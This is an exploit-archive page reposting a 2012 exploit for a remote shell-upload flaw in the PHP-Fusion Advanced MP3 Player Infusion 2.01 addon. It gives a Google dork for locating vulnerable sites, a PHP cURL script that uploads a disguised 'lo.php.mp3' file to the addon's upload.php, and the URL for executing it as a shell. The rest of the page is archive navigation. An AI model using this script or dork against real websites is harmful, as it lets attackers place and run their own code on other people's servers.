Advanced MP3 Player Infusion 2.01 Shell Upload

Advanced MP3 Player Infusion 2.01 Shell Upload: Posted Jun 29, 2012; Authored by Sammy FORGIT; Advanced MP3 Player Infusion version 2.01 suffers from a remote shell upload vulnerability.; tags | exploit, remote, shell; SHA-256 | 0d53259e616b4161775a0b9272f7b7ef1d1569e48797e4a3ba27a9c8136edeff; Download | Favorite | View

Advanced MP3 Player Infusion 2.01 Shell Upload

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Sammy FORGIT member from Inj3ct0r Team             1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
##################################################
# Description : PHP-Fusion Addons - Advanced MP3 Player Infusion 
Arbitrary File Upload Vulnerability
# Version : 2.01
# link : http://www.php-fusion.co.uk/infusions/addondb/view.php?addon_id=19
# Software : 
http://www.php-fusion.co.uk/infusions/addondb/view.php?download=19
# Date : 26-06-2012
# Google Dork : inurl:/infusions/mp3player_panel
# Site : 1337day.com Inj3ct0r Exploit Database
# Author : Sammy FORGIT - sam at opensyscom dot fr - 
http://www.opensyscom.fr
##################################################


Exploit :

PostShell.php
<?php

$uploadfile="lo.php.mp3";

$ch = 
curl_init("http://localhost/php-fusion/infusions/mp3player_panel/upload.php?folder=/php-fusion/infusions/mp3player_panel/");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";

?>

Shell Access : 
http://localhost/php-fusion/infusions/mp3player_panel/lo.php.mp3

lo.php.mp3
<?php
phpinfo();
?>


# Site : 1337day.com Inj3ct0r Exploit Database

Top Authors In Last 30 Days

Red Hat 207 files
Ubuntu 98 files
Debian 18 files
indoushka 18 files
Gentoo 14 files
Google Security Research 13 files
CraCkEr 9 files
Mirabbas Agalarov 9 files
Apple 8 files
nu11secur1ty 7 files

File Archives

Systems

AIX (428)
Apple (1,979)
BSD (373)
CentOS (57)
Cisco (1,920)
Debian (6,753)
Fedora (1,691)
FreeBSD (1,244)
Gentoo (4,321)
HPUX (879)
iOS (344)
iPhone (108)
IRIX (220)
Juniper (67)
Linux (45,783)
Mac OS X (685)
Mandriva (3,105)
NetBSD (256)
OpenBSD (482)
RedHat (13,311)
Slackware (941)
Solaris (1,610)
SUSE (1,444)
Ubuntu (8,633)
UNIX (9,237)
UnixWare (186)
Windows (6,555)
Other

Advanced MP3 Player Infusion 2.01 Shell Upload

Advanced MP3 Player Infusion 2.01 Shell Upload

File Archive:

June 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Advanced MP3 Player Infusion 2.01 Shell Upload

Share This

Advanced MP3 Player Infusion 2.01 Shell Upload

File Archive:

June 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems